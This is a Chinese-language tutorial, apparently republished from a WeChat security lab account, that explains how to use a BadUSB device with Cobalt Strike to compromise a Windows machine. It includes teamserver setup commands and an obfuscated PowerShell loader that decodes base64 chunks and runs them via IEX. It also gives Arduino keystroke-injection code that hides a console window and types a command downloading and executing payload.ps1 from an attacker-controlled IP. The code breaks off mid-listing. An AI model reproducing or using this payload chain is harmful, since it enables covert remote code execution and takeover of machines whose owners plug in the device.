专栏名称: Gamma实验室

Gamma实验室是专注于网络安全攻防研究的实验室，不定时向外输出技术文章以及自主研发安全工具，技术输出不限于：渗透，内网，红队，免杀，病毒分析，逆向，ctfwp等,实验室只用于技术研究，一切违法犯罪与实验室无关！

物理渗透战士：教你如何使用BadUSB配合CS免杀实现上线

Gamma实验室 · 公众号 · · 2021-10-09 13:40

正文

准备工作

购买 badusb 、烧录器、云服务器；共计开销大概二百五

①.在服务器中上传cs、screen，用于制作cs免杀马等

sftp root@IPlsput \xxx\cs.zip
ssh root@IPapt updateapt install unzipunzip cs.zipapt install default-jdkcd cschmod 777 teamserversudo ./teamserver IP password

apt install screenscreen -S test

②.下载并安装开发环境Arduino

由于 Arduino 的易用性，现阶段最常用的 B ad US B 还是基于 Arduino 进行设计的
下载地址：https://www.arduino.cc/en/software （有Windows、Linux、Mac版本，PS：建议别下最新的）

③.通过 zading 软件在电脑上安装对应的烧录器驱动

首先需要让电脑识别到我们的BadUSB设备（PS：需要找老的type-a线，新的我试过去貌似都无法识别）

然后打开 zading 软件，点击 Options - List All Devices ，找到我们的 usbasp 按照下图设置好驱动

当其在设备管理器中显示为 libusb-win32 devices 设备时，就意味着安装好了烧录器驱动

④.下载并安装烧录工具 progisp

网盘链接（提取码：xrb9）

CS免杀操作

制作CS免杀🐎

将其base64编码处理一下

Set-StrictMode -Version 2
$a1 = 'base64编码'$a2 = 'base64编码'$a3 = 'base64编码'$a4 = 'base64编码'$a5 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a1+$a2+$a3+$a4))
If ([IntPtr]::size -eq 8) {  start-job { param($a) IEX $a } -RunAs32 -Argument $a5 | wait-job | Receive-Job}else {  IEX $a5}

接着把文件名改为全大写的，然后通过CS上传至我们的公网服务器上（攻击 - 钓鱼攻击 - 文件下载），实现全程无落地✈

然后将我们需要的操作搞成思路，形成最基础的想法，接着将思路写成代码，通过 Arduino 编译生成hex文件，最后利用工具 progisp 烧录到我们的BadUSB中

附上部分关键代码

//payloadif (onetimeOrForever == 0){  delay(1000);  Keyboard.begin();//开始键盘通讯   delay(1500);//延时   Keyboard.press(KEY_LEFT_GUI);//win键   delay(500);  Keyboard.press('r');//r键  delay(500);   Keyboard.release(KEY_LEFT_GUI);  Keyboard.release('r');  delay(500);  Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法  Keyboard.release(KEY_CAPS_LOCK);  Keyboard.println("CMD /t:01 /k @ECHO OFF && MODE CON:cols=15 lines=1");   //使用最小化隐藏cmd窗口  //cmd /c start /minCMD /C START /MIN POWERSHELL -W HIDDEN  delay(500);  Keyboard.press(KEY_RETURN);   Keyboard.release(KEY_RETURN);   delay(1300);  Keyboard.println("echo set-alias -name rookie -value Invoke-Expression;rookie(new-object net.webclient).downloadstring('http://IP/payload.ps1') | powershell -");  Keyboard.press(KEY_RETURN);   Keyboard.release(KEY_RETURN);   Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法  Keyboard.release(KEY_CAPS_LOCK);  Keyboard.end();//结束键盘通讯    delay(1000);  Keyboard.begin();//开始键盘通讯   delay(1500);//延时   Keyboard.press(KEY_LEFT_GUI);//win键   delay(500);  Keyboard.press('r');//r键  delay(500);   Keyboard.release(KEY_LEFT_GUI);  Keyboard.release('r');  delay(500);  Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法  Keyboard.release(KEY_CAPS_LOCK);  Keyboard.println("notepad.exe");    //打开记事本  delay(500);  Keyboard.println("                                   $$$$ ");  delay(500);  Keyboard.println("                               $$         $$");  Keyboard.println("                               $$         $$");  Keyboard.println("                               $$         $$");  Keyboard.println("                               $$         $$");  Keyboard.println("                               $$         $$");  Keyboard.println("                               $$         $$");  Keyboard.println("                        $$$$$$         $$$$$$");  Keyboard.println("   $$$$$$     $$         $$         $$        $$$$");  Keyboard.println("   $$         $$$$         $$         $$        $$    $$");  Keyboard.println("   $$             $$         $$         $$        $$        $$");  Keyboard.println

物理渗透战士：教你如何使用BadUSB配合CS免杀实现上线

正文

CS免杀操作

请到「今天看啥」查看全文